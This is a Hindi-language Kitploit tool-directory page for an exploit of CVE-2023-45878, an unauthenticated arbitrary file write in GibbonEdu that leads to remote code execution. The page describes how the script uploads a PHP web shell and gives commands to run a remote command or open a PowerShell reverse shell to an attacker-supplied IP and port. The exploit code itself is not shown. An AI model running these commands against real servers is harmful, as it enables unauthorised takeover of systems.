Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-45878 — GibbonEdu मनमाना फ़ाइल लेखन से दूरस्थ कोड निष्पादन | Kitploit
उपकरण/GitHubGitHub/davidzzo23/cve-2023-45878
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubdavidzzo23/cve-2023-45878

CVE-2023-45878

GibbonEdu मनमाना फ़ाइल लेखन से दूरस्थ कोड निष्पादन

रिपॉजिटरी देखें
321 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-45878

GibbonEdu में मनमानी फ़ाइल लेखन से वेब शेल निष्पादन

विवरण

इस रिपॉजिटरी में CVE-2023-45878 का शोषण कोड है, जो GibbonEdu में एक मनमानी फ़ाइल लेखन कमजोरी है। यह कमजोरी rubrics_visualise_saveAjax.php एंडपॉइंट को प्रभावित करती है और एक अप्रमाणित हमलावर को वेब सर्वर पर मनमानी फ़ाइलें अपलोड करने की अनुमति देती है।

यह स्क्रिप्ट कमजोरी का उपयोग करके PHP वेब शेल अपलोड करती है और या तो:

  • एक विशिष्ट सिस्टम कमांड निष्पादित करती है; या
  • रिमोट एक्सेस प्राप्त करने के लिए base64-एन्कोडेड PowerShell रिवर्स शेल ट्रिगर करती है।

उपयोग

स्क्रिप्ट दो मोड में काम करती है:

  • --command (-c): रिमोट पर एक विशिष्ट सिस्टम कमांड निष्पादित करें।
  • --shell (-s): हमलावर के लिसनर पर PowerShell रिवर्स शेल ट्रिगर करें।

शोषण कैसे चलाएं

1. रिपॉजिटरी क्लोन करें

root@kitploit:~
git clone https://github.com/davidzzo23/CVE-2023-45878.git
cd CVE-2023-45878

2. वेब शेल शोषण चलाएं

  • एक रिमोट कमांड चलाएं:
root@kitploit:~
python3 CVE-2023-45878.py -t <लक्ष्य_डोमेन> -c "whoami"
  • PowerShell रिवर्स शेल ट्रिगर करें:
root@kitploit:~
python3 CVE-2023-45878.py -t <लक्ष्य_डोमेन> -s -i <आईपी> -p <पोर्ट>

अस्वीकरण

यह स्क्रिप्ट केवल शैक्षिक उद्देश्यों के लिए है। अनुमति के बिना सिस्टम पर इस शोषण का अनधिकृत उपयोग अवैध है। लेखक इस शोषण के दुरुपयोग या कारण हुई किसी भी क्षति के लिए जिम्मेदार नहीं है।

टूल डाउनलोड करें